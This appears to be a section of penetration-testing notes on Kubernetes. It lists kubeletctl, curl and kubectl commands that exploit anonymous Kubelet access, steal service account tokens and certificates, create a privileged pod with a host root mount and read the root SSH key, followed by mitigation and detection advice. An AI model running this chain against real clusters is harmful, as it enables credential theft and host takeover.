15.Kubernetes

Access Kubelet API (pods list)

curl https://<node_ip>:10250/pods -k | jq

Kubeletctl (pods list)

kubeletctl -i --server <node_ip> pods

Kubeletctl (scan for RCE)

kubeletctl -i --server <node_ip> scan rce

Kubeletctl (execute command in pod)

kubeletctl -i --server <node_ip> exec "id" -p <pod_name> -c <container_name>

Kubeletctl (extract token)

kubeletctl -i --server <node_ip> exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p <pod_name> -c <container_name> | tee -a k8.token

Kubeletctl (extract certificate)

kubeletctl --server <node_ip> exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p <pod_name> -c <container_name> | tee -a ca.crt

Set token variable

export token=`cat k8.token`

Check Kubernetes access rights (kubectl)

kubectl --token=$token --certificate-authority=ca.crt --server=https://<api_server_ip>:6443 auth can-i --list

Apply pod YAML (kubectl)

kubectl --token=$token --certificate-authority=ca.crt --server=https://<api_server_ip>:6443 apply -f privesc.yaml

Get pods (kubectl)

kubectl --token=$token --certificate-authority=ca.crt --server=https://<api_server_ip>:6443 get pods

Kubeletctl (execute command in privileged pod)

kubeletctl --server <node_ip> exec "cat /root/root/.ssh/id_rsa" -p privesc -c privesc

Basic kubectl commands

Get pods

kubectl get pods -A

Get services

kubectl get svc -A

Get deployments

kubectl get deployments -A

Get namespaces

kubectl get ns

Get secrets

kubectl get secrets -A -o yaml

Get service accounts

kubectl get sa -A -o yaml

Get roles

kubectl get roles -A -o yaml

Get rolebindings

kubectl get rolebindings -A -o yaml

Key Concepts:

• Kubernetes Architecture:

  • Control Plane (Master Node): Manages the cluster.

  • Worker Nodes (Minions): Run containerized applications.

  • Pods: Smallest deployable units, containing one or more containers.

• Kubernetes API:

  • Central point of interaction.

  • Uses RESTful requests.

  • Authentication and Authorization (RBAC).

• Kubelet API:

  • Agent running on each node.

  • Can be vulnerable to anonymous access.

  • Allows interaction with pods and containers.

• Security Domains:

  • Cluster infrastructure security.

  • Cluster configuration security.

  • Application security.

  • Data security.

Vulnerabilities and Exploitation Techniques:

• Anonymous Access to Kubelet:

  • Using curl or kubeletctl to access the Kubelet API.

  • Retrieving pod information.

  • Executing commands within containers.

• Service Account Tokens and Certificates:

  • Extracting tokens and certificates from within a compromised pod.

  • Using kubectl with the extracted credentials.

  • Checking access rights (kubectl auth can-i).

• Privileged Pod Creation:

  • Creating a pod with a host root mount.

  • Accessing host system files.

  • Using hostNetwork: true, for network access to the host.

• RBAC Misconfigurations:

  • Exploiting overly permissive RBAC roles.

• Container Vulnerabilities:

  • Exploiting known vulnerabilities in container images.

Exploitation Steps (as described):

1. Access Kubelet API:

   • curl or kubeletctl to retrieve pod information.

2. Extract Service Account Credentials:

   • kubeletctl exec to retrieve token and certificate.

3. Use kubectl with Extracted Credentials:

   • kubectl auth can-i to check permissions.

4. Create Privileged Pod:

   • Create a YAML file with a host root mount.

   • kubectl apply to create the pod.

5. Access Host Files:

   • kubeletctl exec to access host files.

Important Considerations and Enhancements:

• Security Best Practices:

  • Disable anonymous access to Kubelet.

  • Implement strong RBAC policies.

  • Use Network Policies.

  • Regularly scan container images for vulnerabilities.

  • Use pod security policies or pod security standards.

  • Use secrets management.

• Attack Vectors:

  • Compromised container images.

  • Misconfigured RBAC.

  • Vulnerabilities in Kubernetes components.

• Detection:

  • Monitor Kubelet API access.

  • Audit RBAC configurations.

  • Use security scanning tools.

• Namespaces: Reinforce the importance of namespaces in kubernetes security.

• Real World Examples: Researching real world kubernetes escapes will help solidify understanding of the attack vectors.

• Container Runtime Security: Ensure the underlying container runtime is secure.